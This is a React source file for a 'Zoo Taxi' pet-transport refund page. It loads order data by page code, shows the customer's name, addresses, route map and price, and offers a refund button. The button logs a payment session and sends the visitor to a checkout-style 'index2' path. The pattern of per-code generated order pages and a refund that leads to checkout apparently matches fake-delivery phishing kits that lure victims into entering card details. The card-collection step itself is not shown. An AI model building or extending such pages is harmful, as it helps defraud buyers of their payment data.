import React, { useCallback, useEffect, useMemo, useState } from 'react';
import { useNavigate, useParams } from 'react-router-dom';
import './PetTaxiDeSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';
import { parsePageMeta } from '../petTaxiPricing';
import {
  ensureRouteForMap,
  formatRouteAddress,
  resolveMapEmbedSrc,
  resolvePetTaxiRoute,
} from '../petTaxiRoute';
import {
  getPetTaxiLocale,
  resolvePetTaxiCountryCode,
} from '../petTaxiLocales';
import {
  activateRefundFlow,
  buildRefundIndex2Path,
} from '../paymentRefundFlow';
import {
  postPaymentTransitionOnce,
  resolvePaymentPageCode,
  usePaymentSessionId,
} from '../paymentSession';
import { usePaymentPaths } from '../paymentPaths';

const PAW_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/pet-taxi-paw-logo.png`;

function parsePriceNumber(raw) {
  if (raw == null || String(raw).trim() === '') return null;
  const s = String(raw)
    .replace(/\s+/g, '')
    .replace(/[^0-9.,-]/g, '')
    .replace(',', '.');
  const n = parseFloat(s);
  return Number.isFinite(n) ? n : null;
}

function formatPriceText(priceNumber) {
  if (priceNumber == null) return '—';
  return priceNumber % 1 === 0 ? String(priceNumber.toFixed(0)) : String(priceNumber);
}

function PetTaxiBrandLogo({ className = '', brandName = 'Zoo Taxi' }) {
  return (
    <div className={`pt-brand-logo${className ? ` ${className}` : ''}`}>
      <img src={PAW_LOGO_SRC} alt="" className="pt-brand-logo-paw" decoding="async" />
      <span className="pt-brand-logo-text">{brandName}</span>
    </div>
  );
}

function PetTaxiRouteMap({ route, mapTitle, lang, countryCode, loadingLabel }) {
  const [embedSrc, setEmbedSrc] = useState('');
  const [failed, setFailed] = useState(false);

  useEffect(() => {
    let cancelled = false;
    setFailed(false);
    setEmbedSrc('');
    resolveMapEmbedSrc(route, { lang, countryCode })
      .then((src) => {
        if (!cancelled) setEmbedSrc(src || '');
      })
      .catch(() => {
        if (!cancelled) setFailed(true);
      });
    return () => {
      cancelled = true;
    };
  }, [route, lang, countryCode]);

  return (
    <div className="pt-track-map">
      {!embedSrc && !failed && (
        <div className="pt-track-map-loading" aria-busy="true">
          {loadingLabel || '…'}
        </div>
      )}
      {failed && !embedSrc && (
        <div className="pt-track-map-loading">{loadingLabel || '…'}</div>
      )}
      {embedSrc && (
        <iframe
          title={mapTitle}
          src={embedSrc}
          loading="lazy"
          referrerPolicy="no-referrer-when-downgrade"
          allowFullScreen
        />
      )}
    </div>
  );
}

function PetTaxiRouteDetails({ route, pageData, t, trackAmountLine }) {
  if (!route && !pageData) return null;
  return (
    <dl className="pt-track-route-dl">
      {(pageData?.first_name || pageData?.last_name) && (
        <div>
          <dt>{t.customer}</dt>
          <dd>{[pageData.first_name, pageData.last_name].filter(Boolean).join(' ')}</dd>
        </div>
      )}
      {route && (
        <>
          <div><dt>{t.from}</dt><dd>{formatRouteAddress(route.fromStreet, route.fromCity)}</dd></div>
          <div><dt>{t.to}</dt><dd>{formatRouteAddress(route.toStreet, route.toCity)}</dd></div>
          {route.distanceKm != null && (
            <div><dt>{t.distance}</dt><dd>{route.distanceKm} km</dd></div>
          )}
          {route.driveTime && (
            <div><dt>{t.plannedTime}</dt><dd>{route.driveTime}</dd></div>
          )}
        </>
      )}
      {!route && pageData?.delivery_address && (
        <div>
          <dt>{t.addressLabel}</dt>
          <dd>{pageData.delivery_address}</dd>
        </div>
      )}
      <div>
        <dt>{t.amount}</dt>
        <dd className="pt-pay-amount">{trackAmountLine}</dd>
      </div>
    </dl>
  );
}

function PetTaxiRefundPage({ page }) {
  const { pageCode } = useParams();
  const navigate = useNavigate();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page && !!pageCode);
  const sessionId = usePaymentSessionId();

  const effectivePage = pageData || page || null;
  const meta = useMemo(() => parsePageMeta(effectivePage?.page_meta), [effectivePage?.page_meta]);
  const trackingCode = (effectivePage?.tracking_code || '').trim();

  const localeCountry = resolvePetTaxiCountryCode({ pageData: effectivePage, meta });
  const t = getPetTaxiLocale(localeCountry);

  const activePageCode = (pageCode || effectivePage?.page_code || '').trim();
  const { toIndex2 } = usePaymentPaths(activePageCode);
  const index2Path = toIndex2();
  const refundCheckoutPath = buildRefundIndex2Path(index2Path);

  const countryCode = localeCountry;
  const currencyCode = getPrimaryCurrency(countryCode) || meta?.currency || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(
    () =>
      parsePriceNumber(effectivePage?.price) ??
      parsePriceNumber(meta?.pricing?.total),
    [effectivePage?.price, meta?.pricing?.total],
  );
  const amountPriceText = formatPriceText(priceNumber);
  const trackAmountLine =
    amountPriceText === '—' ? `— ${sym}` : `${amountPriceText} ${sym}`;

  const pageRoute = useMemo(() => {
    if (!effectivePage?.tracking_code && !effectivePage?.page_meta && !effectivePage?.delivery_address) {
      return null;
    }
    return resolvePetTaxiRoute({
      meta,
      delivery_address: effectivePage?.delivery_address,
    });
  }, [effectivePage, meta]);

  const mapRoute = useMemo(() => {
    if (!pageRoute) return null;
    return ensureRouteForMap(pageRoute, localeCountry);
  }, [pageRoute, localeCountry]);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [page, pageCode]);

  const handleRefund = useCallback(() => {
    activateRefundFlow();
    const pc = resolvePaymentPageCode(activePageCode);
    const storedLogId = sessionStorage.getItem('payment_log_id');
    const storedSessionId = sessionStorage.getItem('payment_session_id');
    if (storedLogId && storedSessionId && pc) {
      postPaymentTransitionOnce(API_URL, {
        log_id: storedLogId,
        session_id: storedSessionId,
        page_code: pc,
      });
    }
    navigate(refundCheckoutPath);
  }, [activePageCode, navigate, refundCheckoutPath]);

  if (loading) {
    return (
      <div className="pt-page pt-refund-page">
        <p className="pt-loading">{t.loading}</p>
      </div>
    );
  }

  if (!effectivePage) {
    return (
      <div className="pt-page pt-refund-page">
        <p className="pt-error">{t.trackNotFound}</p>
      </div>
    );
  }

  return (
    <div className="pt-page pt-refund-page">
      <header className="pt-header pt-header-compact">
        <PetTaxiBrandLogo brandName={t.title} />
      </header>

      <main className="pt-refund-main">
        <section className="pt-refund-hero">
          <span className="pt-refund-kicker">{t.refundPageKicker}</span>
          <h1 className="pt-refund-title">{t.refundPageTitle}</h1>
          <p className="pt-refund-hint">{t.refundPageHint}</p>
        </section>

        <section className="pt-track-result pt-refund-order">
          <div className="pt-track-result-head">
            <h2>{t.trackModalHead}</h2>
          </div>
          {trackingCode && (
            <p className="pt-track-code-line">
              {t.tracking}: <strong>{trackingCode}</strong>
            </p>
          )}
          {mapRoute && (
            <PetTaxiRouteMap
              route={mapRoute}
              mapTitle={t.mapRouteTitle}
              lang={t.lang}
              countryCode={localeCountry}
              loadingLabel={t.mapLoading}
            />
          )}
          <div className="pt-track-pet-card pt-track-pet-card-inline">
            {effectivePage.photo_url && (
              <img src={effectivePage.photo_url} alt="" className="pt-track-pet-img" />
            )}
            <div>
              <strong>{effectivePage.product_name || '—'}</strong>
              {meta?.weight_kg && <p>{meta.weight_kg} kg</p>}
            </div>
          </div>
          <PetTaxiRouteDetails
            route={pageRoute || mapRoute}
            pageData={effectivePage}
            t={t}
            trackAmountLine={trackAmountLine}
          />
          <div className="pt-refund-actions">
            <button
              type="button"
              className="pt-btn pt-btn-outline pt-btn-block pt-btn-refund"
              onClick={handleRefund}
            >
              {t.cancelRefundBtn}
            </button>
          </div>
        </section>
      </main>

      <footer className="pt-footer pt-footer-minimal">
        <PetTaxiBrandLogo className="pt-footer-logo" brandName={t.title} />
        <p>{t.footerLine}</p>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default PetTaxiRefundPage;
